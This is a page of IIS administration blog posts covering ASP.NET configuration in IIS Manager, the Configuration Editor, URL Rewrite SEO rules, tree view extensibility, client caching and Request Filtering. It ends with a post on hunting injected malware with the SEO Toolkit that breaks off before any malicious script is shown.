Posts
  • CarlosAg Blog

    Managing ASP.NET Configuration Settings using IIS Manager

    • 0 Comments

    Today somebody asked a question about how to manage some ASP.NET configuration settings, such as changing the trust level of the application, adding a few application settings, and setting compilation to debug. I thought it would be trivial to search the web for an article showing the features we added in IIS 7.0 to manage those, but to my surprise I was not able to find anything that clearly shows them, so I decided to write this quickly for anyone who is not aware of them.


    With the release of IIS 7.0 (included in Windows Vista and Windows Server 2008), and of course included in IIS 7.5 (Windows 7 and Windows Server 2008 R2) we added a set of features for managing some of the configuration of common ASP.NET features inside the same IIS Manager. Those features include:

    1. .NET Authorization Rules 1 – Manages the authorization rules for ASP.NET; this is particularly useful when using Classic Mode. This UI is basically a graphical way to manage the system.web/authorization section.
    2. .NET Compilation – This exposes the settings used by the ASP.NET compilation engine, such as list of assemblies, Debug settings, VB settings (Option Strict, Option Explicit), Temp directory, etc. This UI saves all the settings in the system.web/compilation section.
    3. .NET Error Pages 1 – Allows you to manage the ASP.NET custom errors, exposing the system.web/customErrors section.
    4. .NET Globalization – Allows you to manage the globalization settings such as file encoding, UI culture, etc. This modifies the system.web/globalization section.
    5. .NET Providers 2 – Allows you to manage the configuration of the different ASP.NET providers, such as Roles, Membership and Profile (system.web/membership, system.web/profile, system.web/roleManager, etc.).
    6. .NET Users, .NET Roles and .NET Profile 2 – Configure options that track settings for ASP.NET applications. All these features use the ASP.NET runtime configuration to allow you to manage their settings, such as adding users, roles and profile settings. (This is what this post is about.) These do not modify configuration; instead they use the configured provider (such as SqlMembershipProvider, SqlRoleProvider, WindowsTokenRoleProvider, etc.).
    7. .NET Trust Levels – Allows you to configure the security trust level policy for the application. Modifies the system.web/trust section.
    8. Application Settings – Allows you to manage the name/value pair stored in the .NET appSettings section.
    9. Connection Strings – Configures the database connection strings that can be used by ASP.NET applications. Manages the connectionStrings section.
    10. Machine Key – Allows you to modify the machine key and other related settings stored in system.web/machineKey section.
    11. Pages and Controls – Allows you to modify settings from the system.web/pages section, such as Base class, Namespaces, and Controls registered.
    12. Session State – Allows you to configure the session state settings such as connection string, cookie configuration and other configuration included in system.web/sessionState.
    13. SMTP E-mail – Configure the SMTP settings such as Server, Delivery mode, or Pickup directory, included in system.net/mailSettings/smtp section.

    1 – These features are included in Windows 7 and Windows Server 2008 R2, but can be installed on Windows Vista and Windows Server 2008 by downloading the Administration Pack for IIS 7.0.

    2 – Note: these features require hosting the ASP.NET runtime, and due to technical limitations only application pools configured to run .NET version 2.0 will show them. This means that if you configure your application pool to run .NET 4.0 (in IIS 7.0 and IIS 7.5) you will not see these features. As a workaround you could temporarily change the application pool to run 2.0, make your changes, and switch it back to 4.0 (of course, this is not recommended for production environments).
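
    To make the mapping concrete, below is a minimal web.config sketch of the kind of markup these features read and write. This is an illustration rather than output from the tool; the key name "MySetting" and the values are made up:

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
      <appSettings>
        <!-- managed by the Application Settings feature -->
        <add key="MySetting" value="SomeValue" />
      </appSettings>
      <system.web>
        <!-- managed by the .NET Compilation feature -->
        <compilation debug="true" />
        <!-- managed by the .NET Trust Levels feature -->
        <trust level="Medium" />
      </system.web>
    </configuration>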

    These features are not meant to expose every setting included in ASP.NET, and they only include configuration settings up to .NET 2.0. I should also add that IIS includes a generic Configuration Editor that allows you to manage many more configuration settings from ASP.NET, IIS and beyond, including sections like webParts, trace, siteMap, and others.


    The best thing is that you can apply the changes immediately, or you can make your changes and just generate the code to automate them later, whether as JavaScript, managed code, or an AppCmd.exe command line.
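
    For the managed-code route, here is a minimal sketch using Microsoft.Web.Administration that flips the compilation debug flag of a site; treat it as an illustration (the site name "Default Web Site" is just an example):

    using System;
    using Microsoft.Web.Administration;

    class Sample {
        static void Main() {
            using (ServerManager serverManager = new ServerManager()) {
                // Open the web.config of the target site ("Default Web Site" is an example)
                Configuration config = serverManager.GetWebConfiguration("Default Web Site");

                // system.web/compilation is the section the .NET Compilation feature manages
                ConfigurationSection compilation = config.GetSection("system.web/compilation");
                compilation["debug"] = true;

                serverManager.CommitChanges();
            }
        }
    }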


  • CarlosAg Blog

    IIS Admin Pack: Configuration Editor

    • 3 Comments

    Today I will be talking about one of the features included in the new IIS Admin Pack called Configuration Editor.

    Configuration Editor is an IIS Manager feature that will let you manage any configuration section available in your configuration system. Configuration Editor exposes several capabilities of the configuration system that are not exposed anywhere else in IIS Manager, including:

    1. Schema Driven - Config Editor is entirely driven by the configuration schema (found in \windows\system32\inetsrv\config\schema\); this means that if you extend the configuration system by creating your own sections, they will be available for managing inside Config Editor, with no need to build additional UI for them.
    2. Additional Information - Config Editor exposes more information, such as the deepest place where the section is being used, or where a particular element in a collection is coming from (where is it inherited from?), etc.
    3. Script Generation - Allows you to make changes and generates the code to automate those tasks, producing managed code (using Microsoft.Web.Administration), JavaScript (using AHADMIN) or a command line (using AppCmd).
    4. Searching - Allows you to quickly perform scoped searches of the configuration system for all the sections and where they are being used, becoming a great way to get a bigger picture of the server as well as to prevent configuration locking violations and many other uses.
    5. Locking - Allows you to do advanced locking such as locking specific attributes so that they cannot be used in deeper locations, lock individual items in a collection or lock the entire section, etc.

    Please give us feedback on things you would like to see or change at the IIS Forums: http://forums.iis.net/1149.aspx

    OK, but rather than keep adding more and more text, I will just show you a video of how it looks and all its features (for those of you who like text, there is a transcript below).

    Transcript:

    So I have here Windows Vista SP1 with the IIS Admin Pack installed; on my machine I have very few applications installed, but it should be enough to show some of the features of Config Editor. When entering Config Editor, the first thing you will notice is that at the top there is a drop-down list that shows all the sections currently schematized and ready to be used in your system.

    Since this is sorted alphabetically, the first section that gets selected is appSettings. From here I can very easily switch between the ASP.NET configuration sections, such as system.web/authentication, or the IIS configuration sections, such as system.webServer/defaultDocument or system.applicationHost/sites, which contains all the site configuration for IIS.

    As you can see the user interface displays the configuration elements and properties of the section that is selected, providing you an easy way to see every single configuration property available in the system.

    At the top you'll get a label specifying the deepest path where this section is being used relative to your scope; in this case it's telling us that it's been set in applicationHost.config. Below that, all the elements and properties are shown in a property grid that displays elements as collapsible sets of properties.

    One of the interesting things is that we provide validation for the properties; for example, when entering string characters in a numeric property, an error message will be displayed giving you the details of the expected type. There are additional benefits such as type editors: when editing a property of type boolean, you get the True/False drop-down, and when a property is of an enumeration type, such as the LogFormat inside the SiteDefaults, you get a drop-down list with only the options that are allowed for that enumeration. In the same way, when editing a property of a flags type, such as logExtFileFlags, which contains the fields to include in the log file, you get a multi-select drop-down list where you can select and de-select the different options.

    Also, you will notice that additional information is displayed as you select the different properties, giving you details of their data type as well as any additional validations. For example, the truncateSize property specifies that only a certain range is considered valid; if I type a value that is not within that range, it shows a message giving me the details of the problem.

    Making Changes

    Now, let's move to a simpler section so that we can show other features of the Configuration Editor. For example, here in Default Documents, if I want to disable it I just change Enabled to False and click Apply. As you would expect, all the changes are applied. To see what this actually changed in my system, I'm going to show a diff against the configuration I backed up, and indeed the only change in my configuration system is that the value changed from true to false.

    Collection Editor

    As you will notice, there is a collection in this section. All collections are shown in an advanced collection editor that lets you see all the information of the items in it, including the ability to add, remove and clear the collection, as well as lock individual items in it. It additionally shows where each of the individual items is coming from, making it easier to understand the distributed configuration.

    Another thing you will notice is that this collection editor shows some visual cues to help you deal with the data; for example, this little key here tells you that this property is the unique key of the collection item.

    So let's actually add a new one. For that I just need to click Add and fill in the values; in this case, let's add Home.aspx as a new default document. After doing that, I can close the dialog and click Apply. Let's take a look at what happened to my configuration: as you can see, the new item was added. It's really easy to see and change configuration in collections.

    Script Generation

    Now, one of the interesting things is what to do with changes like the ones I just made. Applying them immediately is great, but sometimes I don't want that; instead I want to automate them so that I can apply them at a later time. For example, let's change the Enabled attribute back to true, and rather than applying the change as we did before, I want to generate the script, because I'm probably creating a provisioning script for my site and want to include this as part of it. Just by clicking Generate Script I get a dialog that gives me the code as managed code using Microsoft.Web.Administration in C#, and as you can see it's quite easy to read. It also gives me JavaScript code that uses a COM library our configuration system ships, called Microsoft.ApplicationHost, and just like the managed code version it simply sets the value. Finally, it gives me the command line for it, so you don't need to build code or scripts; you can just run the command line.

    To prove that, let's actually run this command line. First let's show the diff again so that we see that it's set to false. Now let's run the command line with AppCmd, which lives in the Inetsrv directory, and show the diff again: as you can see, it actually sets the value as expected. This will help you write scripts or code to manipulate IIS and ASP.NET settings without requiring additional knowledge.
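
    For reference, the generated AppCmd command line for a change like this looks roughly as follows; this is a sketch of the typical output, not necessarily the exact text the dialog produces:

    %windir%\system32\inetsrv\appcmd.exe set config -section:system.webServer/defaultDocument -enabled:"True" /commit:apphost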

    Locking

    Another interesting feature is locking. For example, if I want to make sure that my default documents are always enabled and no one else can override them, I can go here, select the enabled attribute and click Lock Attribute, which will prevent it from being changed in any other web.config file.

    Search Configuration

    Now, another interesting feature, and probably one of the most powerful, is the ability to search the configuration so that you can get a high-level overview of the configuration system and all the web.config files in it. Just click Search Configuration. This brings up a dialog that shows the root web.config with all the sections being set in it, and applicationHost.config with all the sections being used there, as well as a location tag for a particular application that sets some sections of its own. You will notice that I also have a couple of applications that include web.config's in their folders and sub-folders, where we can see, for example, which sections each of those web.config's includes.

    One of the neat features is that you can actually click any of these nodes and it will immediately display the contents of the section as well as where it's coming from. For example, if I click the web.config, my entire web.config is displayed; if I click a specific section, only the contents of that section are displayed. I can even click the locationPath I'm interested in and get only that particular one.

    Additionally, you can easily search for who is changing the authorization settings from ASP.NET, and just like that you can see all the places in your server where the authorization settings are being set, quickly identifying all the settings being used on your server. This feature is extremely useful because now you can search, for example, for Default Document and make sure nobody is changing it and that no one is violating the locking we just did.

    It also allows you to see the files in a flat view, which gives you all the different paths and the files each of them is coming from. You get the exact same functionality; it's just a different visual representation of the config.

    Schema-Driven

    Another interesting thing is that if you want to build your own sections and extend our configuration system, you can go to the schema folder and write your own configuration section, declaring it using our schema notation. Here I'm just defining a section named mySection that includes an attribute called enabled of type bool, an attribute called message of type string, and an attribute called password of type string that should be encrypted (a sketch of the schema is shown below). Now I just need to edit applicationHost.config to declare the section so that the config system knows we are going to consume it. Just by doing that, I can go back to Config Editor, refresh the window, and my section is now available in the drop-down. As you would expect, it displays all of the properties I defined, and I can just go ahead and set them, and I get all the locking functionality, all the script generation, and all the UI validation.
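
    For those who want to try this, here is a hedged sketch of what such a schema file could look like (the file name mySection_schema.xml and the AesProvider default are illustrative), plus the declaration that goes into the <configSections> of applicationHost.config:

    <!-- \windows\system32\inetsrv\config\schema\mySection_schema.xml (name is illustrative) -->
    <configSchema>
      <sectionSchema name="mySection">
        <attribute name="enabled" type="bool" defaultValue="false" />
        <attribute name="message" type="string" />
        <attribute name="password" type="string" encrypted="true" defaultValue="[enc:AesProvider::enc]" />
      </sectionSchema>
    </configSchema>

    <!-- declaration inside the <configSections> of applicationHost.config -->
    <section name="mySection" overrideModeDefault="Allow" />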

    And if I apply, you will see that as expected the changes are done, the password attribute is encrypted, etc.

    So as you can see configuration editor is an extremely powerful feature that will be really useful for successfully managing the web.config's in your system.

  • CarlosAg Blog

    SEO made easy with IIS URL Rewrite 2.0 SEO templates

    • 8 Comments

    A few weeks ago my team released version 2.0 of URL Rewrite for IIS. URL Rewrite is probably the most powerful rewrite engine for Web applications. It gives you many features, including inbound rewriting (i.e. rewrite the URL, redirect to another URL, abort requests, use of maps, and more), and in version 2.0 it also includes outbound rewriting, so that you can rewrite URLs or any markup as the content is being sent back, even if it's generated using PHP, ASP.NET or any other technology.

    It also includes a very powerful user interface that allows you to test your regular expressions, and even better, it includes a set of templates for common types of rules. Some of those rules are incredibly valuable for SEO (Search Engine Optimization) purposes. The SEO rules are:

    1. Enforce Lowercase URLs. It will make sure that every URL is served using only lower case, and if not, it will redirect with a 301 to the lower-case version.
    2. Enforce a Canonical Domain Name. It will help you specify what domain name you want to use for your site and it will redirect the traffic to the right host name.
    3. Append or Remove the Trailing Slash. It will make sure your requests either include or omit the trailing slash, depending on your preference.


    For more information on the SEO Templates look at: http://learn.iis.net/page.aspx/806/seo-rule-templates/

    What is really cool is that you can use the SEO Toolkit to run against your application; you will probably get some violations around lower-case URLs, canonical domains, etc., and after seeing those you can use URL Rewrite 2.0 to fix them with one click.

    I have personally used it on my Web site. Try the following three URLs: all of them will be redirected to the canonical form (http://www.carlosag.net/Tools/CodeTranslator/), and you will see URL Rewrite in action:

    1. http://www.carlosag.net/Tools/CodeTranslator/
    2. http://carlosag.net/Tools/CodeTranslator/
    3. http://www.carlosag.net/Tools/CodeTranslator

    Note that in the end those templates just translate to web.config settings that become part of your application and can be XCOPY-deployed with it. This works with ASP.NET, PHP, or any other server technology, including static files. Below is the output of the Canonical Host Name rule, which I use in my Web site's web.config:

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
      <system.webServer>
        <rewrite>
          <rules>
            <rule name="CanonicalHostNameRule1">
              <match url="(.*)" />
              <conditions>
                <add input="{HTTP_HOST}" pattern="^www\.carlosag\.net$" negate="true" />
              </conditions>
              <action type="Redirect" url="http://www.carlosag.net/{R:1}" />
            </rule>
          </rules>
        </rewrite>
      </system.webServer>
    </configuration>
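
    For comparison, the Enforce Lowercase URLs template generates a rule of roughly this shape (a sketch based on the standard template output, so verify against what the UI writes for you):

    <rule name="LowerCaseRule1" stopProcessing="true">
      <match url="[A-Z]" ignoreCase="false" />
      <action type="Redirect" url="{ToLower:{URL}}" />
    </rule>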

    There are many more features I could talk about, but for now this was just a quick SEO-related post.

  • CarlosAg Blog

    Extending the TreeView in IIS 7 in Windows Vista

    • 8 Comments

    Extending the Hierarchy Tree View in InetMgr

    InetMgr exposes several extensibility points that developers can use to plug in their own features and make them look and feel just like the built-in functionality. One of those extensibility features is the hierarchy tree view, which is exposed mainly through three classes:

    1. HierarchyService. This class handles the entire hierarchy; an instance is provided by the UI, and you can get a reference to it through a ServiceProvider. It is used to manipulate the tree view programmatically, exposing methods to perform actions such as Select, Delete, Refresh, etc.
    2. HierarchyInfo. This abstract class represents a node in the tree view; for example, the Web Sites node, the Default Web Site node and the connections node are instances of HierarchyInfo's. This class has properties like Text and Image, and allows you to react to actions such as selection, deletion, etc. Developers extending the tree view will need to create their own derived classes to implement the behavior, as explained below.
    3. HierarchyProvider. This abstract class is the base class for all features that want to extend the tree view. HierarchyService will query each of the registered providers to create the tree view. Developers who wish to add their own nodes should register a HierarchyProvider through the IExtensibilityManager interface.

    To extend the Tree view to add your own set of nodes or context menu tasks, developers need to perform the following actions:

    1. Create a class that derives from HierarchyProvider and handles GetChildren and/or GetTaskItems to provide any nodes or tasks as needed.
    2. Register the HierarchyProvider using the IExtensibilityManager; this is typically done during the module initialization phase.
    3. Handle navigation and synchronization as needed.


    Tasks illustrated in this walkthrough include:

    • Creating a HierarchyProvider and creating HierarchyInfo classes
    • Registering a HierarchyProvider
    • Testing the new feature
    Note:
    This walkthrough is a continuation of the previous three walkthroughs on how to extend InetMgr.
    You can find the first three at:

    Task 1: Creating a HierarchyProvider

    HierarchyProvider is the base class that developers need to inherit from in order to get calls from the UI whenever a node needs to be loaded. This way they can choose to add nodes or tasks to the HierarchyInfo node that is passed as an argument.


    To create a HierarchyProvider
    1. Back in Microsoft Visual Studio 2005 in the ExtensibilityDemo solution, select the option Add New Item from the Project Menu. In the Add New Item dialog select the Class template and type DemoHierarchyProvider.cs as the name for the file.
    2. Change the code so that it looks as follows:
      using System;
      using Microsoft.Web.Management.Client;

      namespace ExtensibilityDemo {

          internal class DemoHierarchyProvider : HierarchyProvider {

              public DemoHierarchyProvider(IServiceProvider serviceProvider)
                  : base(serviceProvider) {
              }

              public override HierarchyInfo[] GetChildren(HierarchyInfo item) {
                  if (item.NodeType == HierarchyInfo.ServerConnection) {
                      return new HierarchyInfo[] { new DemoHierarchyInfo(this) };
                  }

                  return null;
              }

              internal class DemoHierarchyInfo : HierarchyInfo {

                  public DemoHierarchyInfo(IServiceProvider serviceProvider)
                      : base(serviceProvider) {
                  }

                  public override string NodeType {
                      get {
                          return "DemoHierarchyInfo";
                      }
                  }

                  public override bool SupportsChildren {
                      get {
                          return false;
                      }
                  }

                  public override string Text {
                      get {
                          return "Demo Page";
                      }
                  }

                  protected override bool OnSelected() {
                      return Navigate(typeof(DemoPage));
                  }
              }
          }
      }

    The code above creates a class derived from HierarchyProvider that implements the base GetChildren method, verifying that the node being expanded is a ServerConnection; if that is the case, it returns an instance of a DemoHierarchyInfo node that will be added to that connection. The class DemoHierarchyInfo simply specifies its NodeType (a non-localized string that identifies the type of this node), SupportsChildren (false, so that the + sign is not offered in the tree view) and Text (the localized text that will be displayed in the tree view). Finally, it overrides the OnSelected method and navigates to the DemoPage as needed.

    Task 2: Registering the HierarchyProvider

    In this task we will register the hierarchy provider created in the previous task so that the HierarchyService starts calling this type to extend the tree view.

    To register the provider
    1. Back in Microsoft Visual Studio 2005, open the file DemoModule.cs, and add the following code at the end of the Initialize method to register the provider:
      IExtensibilityManager extensibilityManager =
          (IExtensibilityManager)GetService(typeof(IExtensibilityManager));

      extensibilityManager.RegisterExtension(
          typeof(HierarchyProvider),
          new DemoHierarchyProvider(serviceProvider));
    2. The entire code should look as follows:
      protected override void Initialize(IServiceProvider serviceProvider,
                                         ModuleInfo moduleInfo) {
          base.Initialize(serviceProvider, moduleInfo);

          IControlPanel controlPanel =
              (IControlPanel)GetService(typeof(IControlPanel));

          ModulePageInfo modulePageInfo =
              new ModulePageInfo(this, typeof(DemoPage), "Demo", "Demo Page");

          controlPanel.RegisterPage(modulePageInfo);

          IExtensibilityManager extensibilityManager =
              (IExtensibilityManager)GetService(typeof(IExtensibilityManager));

          extensibilityManager.RegisterExtension(
              typeof(HierarchyProvider),
              new DemoHierarchyProvider(serviceProvider));
      }

    Task 3: Testing the new feature

    To test the feature

    1. Compile everything using Build Solution from the Build Menu and run InetMgr.exe from the <Windows>\System32\InetSrv directory.
    2. Connect to localhost using the TreeView and expand the server connection node.
    3. This will show the new node underneath the connection. When you click on it, it will navigate to the demo page just as expected.


    4. Furthermore, the breadcrumb at the top of the UI will automatically discover it, and you will be able to navigate to the page by clicking on it, as well as by using the text editing and intellisense features it provides.


    Next Steps

    In this lab, you learned how to extend the tree view to customize any node in it and add your own nodes to it. You can also override the GetTaskItems method to provide context menu tasks for existing nodes (a rough sketch follows below), and you can override the SyncSelection method to customize how synchronization of navigation works.
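
    As a rough sketch of the GetTaskItems idea, and with the caveat that the exact signature is assumed here to mirror GetChildren (verify it against the SDK before relying on it), a provider could add a context menu task like this:

    // Assumption: GetTaskItems mirrors GetChildren and returns the tasks for a node.
    public override TaskItem[] GetTaskItems(HierarchyInfo item) {
        if (item.NodeType == "DemoHierarchyInfo") {
            // MethodTaskItem invokes the named method when the task is clicked;
            // "ShowDemo" is a hypothetical method name for this sketch.
            return new TaskItem[] {
                new MethodTaskItem("ShowDemo", "Show Demo Page", "Tasks")
            };
        }

        return null;
    }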

  • CarlosAg Blog

    Are you caching your images and scripts? IIS SEO can tell you

    • 2 Comments

    One easy way to enhance the experience of users visiting your Web site is to increase the perceived performance of navigating your site by reducing the number of HTTP requests required to display a page. There are several techniques for achieving this, such as merging scripts into a single file, merging images into one big image, etc., but by far the simplest one of all is making sure that you cache as much as you can on the client. This will not only improve rendering time but will also reduce the load on your server and your bandwidth consumption.

    Unfortunately, the different types of caches and the different ways of setting them can be quite confusing and esoteric. So my recommendation is to pick one way and use it all the time, and that way is using the HTTP 1.1 Cache-Control header.

    So first of all, how do I know if my application is well behaved and sending the right headers so browsers can cache content? You can use a network monitor or tools like Fiddler or WFetch to look at all the headers and figure out if they are being sent correctly. However, you will soon realize that this process won't scale for a site with hundreds, if not thousands, of scripts, styles and images.

    Enter Site Analysis - IIS Search Engine Optimization Toolkit

    To figure out if your images are sending the right headers you can follow these steps:

    1. Install the IIS Search Engine Optimization Toolkit from http://www.iis.net/extensions/SEOToolkit
    2. Launch InetMgr.exe (IIS Manager) and crawl your Web Site. For more details on how to do that refer to the article "Using Site Analysis to crawl a web site".
    3. Once you are in the Site Analysis dashboard view you can start a New Query by using the Menu "Query->New Query" and add the following criteria:
      1. Is External - Equals - False -> To only include the files that are coming from your Web site.
      2. Status code - Equals - OK -> To include only successful requests
      3. Content Type Normalized - Begins With - image/ -> To include only images
      4. Headers - Not Contains - Cache-Control: -> To include the ones that do not have the Cache-Control header specified
      5. Headers - Not Contains - Expires: -> To include only the ones that do not have the Expires header
      6. Press Execute, and this will display all the images in your Web site that are not specifying any caching behavior.

    Alternatively, you can just save the following query as "ImagesNotCached.xml" and use the menu "Query->Open Query" to load it. This makes it easy to open the query for different Web sites or keep testing the results when making changes:

    <?xml version="1.0" encoding="utf-8"?>
    <query dataSource="urls">
      <filter>
        <expression field="IsExternal" operator="Equals" value="False" />
        <expression field="StatusCode" operator="Equals" value="OK" />
        <expression field="ContentTypeNormalized" operator="Begins" value="image/" />
        <expression field="Headers" operator="NotContains" value="Cache-Control:" />
        <expression field="Headers" operator="NotContains" value="Expires:" />
      </filter>
      <displayFields>
        <field name="URL" />
        <field name="ContentTypeNormalized" />
        <field name="StatusCode" />
      </displayFields>
    </query>

    How do I fix it?

    In IIS 7 this is trivial to fix: you can just drop a web.config file in the same directory as your images, scripts and CSS styles, specifying the caching behavior for them. The following web.config will send the Cache-Control header so that the browser caches the responses for up to 7 days.

    <?xml version="1.0" encoding="UTF-8"?>
    <configuration>
      <system.webServer>
        <staticContent>
          <clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="7.00:00:00" />
        </staticContent>
      </system.webServer>
    </configuration>

    You can also do this through the UI (IIS Manager) by going into the "HTTP Response Headers" feature -> "Set Common Headers...", or through any of our APIs using managed code, JavaScript or your favorite language:

    http://www.iis.net/ConfigReference/system.webServer/staticContent/clientCache
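
    For the managed-code option, a minimal Microsoft.Web.Administration sketch would look something like the following; the site name "Default Web Site" and the "/images" path are illustrative:

    using System;
    using Microsoft.Web.Administration;

    class SetClientCache {
        static void Main() {
            using (ServerManager serverManager = new ServerManager()) {
                // Open the web.config of the folder that holds the images
                Configuration config = serverManager.GetWebConfiguration("Default Web Site", "/images");

                ConfigurationSection staticContent = config.GetSection("system.webServer/staticContent");
                ConfigurationElement clientCache = staticContent.GetChildElement("clientCache");
                clientCache["cacheControlMode"] = "UseMaxAge";
                clientCache["cacheControlMaxAge"] = TimeSpan.FromDays(7);

                serverManager.CommitChanges();
            }
        }
    }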

    Furthermore, using the same query above in the Query Builder you can group by directory and find the directories where it is really worth adding this. It is just a matter of clicking the "Group by" button and adding URL-Directory to the Group by clauses. Not surprisingly, in my case it flags the App_Themes directory, where I store 8 images.


    Finally, what about 304's?

    One thing to note is that even if you do not do anything, most modern browsers will use conditional requests to reduce latency when they have a copy in their cache. As an example, imagine the browser needs to display logo.gif as part of displaying test.htm and that image is available in its cache; the browser will issue a request like this:

    GET /logo.gif HTTP/1.1
    Accept: */*
    Referer: http://carlosag-client/test.htm
    Accept-Language: en-us
    User-Agent: (whatever-browser-you-are-using)
    Accept-Encoding: gzip, deflate
    If-Modified-Since: Mon, 09 Jun 2008 16:58:00 GMT
    If-None-Match: "01c13f951cac81:0"
    Host: carlosagdev:8080
    Connection: Keep-Alive

    Note the use of the If-Modified-Since header, which tells the server to only send the actual data if it has been changed after that time. In this case it hasn't, so the server responds with a status code 304 (Not Modified):

    HTTP/1.1 304 Not Modified
    Last-Modified: Mon, 09 Jun 2008 16:58:00 GMT
    Accept-Ranges: bytes
    ETag: "01c13f951cac81:0"
    Server: Microsoft-IIS/7.0
    X-Powered-By: ASP.NET
    Date: Sun, 07 Jun 2009 06:33:51 GMT

    Even though this helps, it still requires a whole round trip to the server, and even though the response is short, it can still have a significant impact if rendering of the page is waiting for it, as in the case of a CSS file that the browser needs to resolve to display the page correctly, or an <img> tag that does not include the dimensions (width and height attributes) and so requires the actual image to determine the required space (one reason why you should always specify the dimensions in markup to improve rendering performance).
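
    With the Cache-Control header from the web.config above in place, the image response carries something like the following, and the browser can skip that round trip entirely for up to 7 days (604800 seconds):

    HTTP/1.1 200 OK
    Content-Type: image/gif
    Cache-Control: max-age=604800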

    Summary

    To summarize, with the IIS Search Engine Optimization Toolkit you can easily build your own queries to learn more about your own Web site, allowing you to easily find details that would otherwise be tedious to gather. In this case I showed how easy it is to find all the images that are not specifying any caching headers; you can do the same for scripts (Content Type Normalized - Equals - application/javascript) or styles (Content Type Normalized - Equals - text/css). This way you can improve rendering performance and reduce the overall bandwidth of your Web site.

  • CarlosAg Blog

    Internet Information Services (IIS) 7.0 Manager for Windows XP, 2003 and Windows Vista SP1 RC0 is available for download

    • 6 Comments

    NOTE: RTM has been released see the following blog: http://blogs.msdn.com/carlosag/archive/2008/03/04/IISManagerForWindowsXPand2003andVista.aspx 

    With the release of Windows Server 2008 RC0, in IIS we are also releasing the ability to manage the Web Server, the new FTP Server and the new modules remotely using IIS Manager 7.0.

    In the past, with previous Betas, we shipped similar functionality under a different name; however, for the first time this is the real way we will be supporting this remote administration from different Windows versions when the final version of Windows Server 2008 comes along.

    The reason this release in particular is exciting is that for the first time all the UI extensibility is enabled for these platforms, making it possible to build your own UI modules, install them on the server, and have the clients that connect to your server automatically download the new functionality and use it as if it were part of the IIS Manager release.

    Another reason this is important for us is that this is the first time we are releasing support for x64, which is required for customers using the Windows Vista 64-bit edition or any other 64-bit version of Windows.

    You can download and install them from:

    x86

    http://www.iis.net/downloads/default.aspx?tabid=34&g=6&i=1524

    x64

    http://www.iis.net/downloads/default.aspx?tabid=34&i=1525&g=6

    Note: This RC0 version will not be able to connect to any older build of Windows Server 2008, including Beta 3, so if you still need to manage a Beta 3 version you will need to install the Beta 3 build of the tool, which can safely live side-by-side with the RC0 build.

  • CarlosAg Blog

    IIS 7.0 Admin Pack: Request Filtering

    • 12 Comments

    My last post talked about the Technical Preview release of the IIS 7.0 Admin Pack and how it includes 7 new features that will help you manage your IIS 7.0 server.

    Today I was going to start writing about each feature in more detail, and Bill Staples just posted something (How to (un)block directories with IIS7 web.config) that almost seems planned as an introduction to one of the features in the Admin Pack, namely the Request Filtering UI.

    IIS 7.0 includes a feature called Request Filtering that provides additional capabilities to secure your Web server; for example, it will let you filter requests that are double escaped, filter requests that use certain HTTP verbs, or even block requests to specific "folders", etc. I will not go into the details of this functionality; if you want to learn more about it you can see the Request Filtering articles at http://learn.iis.net

    In his blog, Bill mentions how you can easily configure Request Filtering using any text editor, such as Notepad, and edit the web.config manually. That was required since we did not ship UI for it within IIS Manager due to time constraints and other things. But now, as part of the Admin Pack, we are releasing UI for managing the Request Filtering settings.

    Following what Bill just showed in his blog, this is the way you would do it using the new UI instead.

    1) Install IIS Admin Pack (Technical Preview)

    2) Launch IIS Manager

    3) Drill down using the Tree View to the site or application you want to change the settings for.

    4) Enter the new feature called Request Filtering inside the IIS category

    5) Select the Hidden Segments and choose "Add Hidden Segment" from the Task List on the right

    6) Add the item

    As you would expect, the outcome is exactly as Bill explained in his blog, just an entry within your web.config, something like:

    <system.webServer>
      <security>
        <requestFiltering>
          <hiddenSegments>
            <add segment="log" />
          </hiddenSegments>
        </requestFiltering>
      </security>
    </system.webServer>

    So as you can see, the Request Filtering UI will help you discover some of the nice security settings that IIS 7.0 has. Beyond hidden segments, the UI also lets you configure additional settings such as Verbs, Headers, URL Sequences, URL Length, Query String size, etc.
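
    To give a flavor of what those settings translate to in configuration terms, here is a hedged web.config sketch with illustrative values (blocking the TRACE verb, denying ".." sequences, and capping URL and query string lengths):

    <system.webServer>
      <security>
        <requestFiltering>
          <verbs>
            <add verb="TRACE" allowed="false" />
          </verbs>
          <denyUrlSequences>
            <add sequence=".." />
          </denyUrlSequences>
          <requestLimits maxUrl="4096" maxQueryString="2048" />
        </requestFiltering>
      </security>
    </system.webServer>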

  • CarlosAg Blog

    Finding malware in your Web Site using IIS SEO Toolkit

    • 3 Comments

    The other day a friend of mine who owns a Web site asked me to look at it to see if I could spot anything weird, since according to his Web hosting provider it was being flagged as malware infected by Google.

    My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. The designer downloaded the HTML pages and tried looking for anything suspicious in them; however, he was not able to find anything. My friend then went back to his hosting provider, mentioned that they were not able to find anything problematic, and asked whether it could be something with the server configuration, to which they replied sarcastically that it was probably ignorance on the part of his Web site designer.

    Enter IIS SEO Toolkit

    So of course I decided the first thing I would do was crawl the Web site using Site Analysis in the IIS SEO Toolkit. This gave me a list of all the pages and resources of his Web site. I knew that malware usually hides either in executables or in scripts on the server, so I started looking at the different content types shown in the "Content Types Summary" inside the Content reports on the dashboard page.


    I was surprised not to find a single executable and to see only two very simple JavaScript files, neither of which looked like malware in any way. Based on previous knowledge, I knew that malware in HTML pages usually hides behind a funky-looking script that is encoded and typically uses the eval function to run the code. So I quickly ran a query for HTML pages that contain the word eval and the word unescape. I know there are valid scripts that use those functions, since they exist for a reason, but it was a good way to start scoping the pages.

    Gumblar and Martuz.cn Malware on sight


    After running the query described above, I got a set of HTML files, all of which gave a status code 404 - NOT FOUND. Double-clicking on any of them and looking at the HTML markup made it immediately obvious that they were malware infected; look at the following markup:

    <HTML>
    <HEAD>
    <TITLE>404 Not Found</TITLE>
    </HEAD>
    <script language=javascript><!-- 
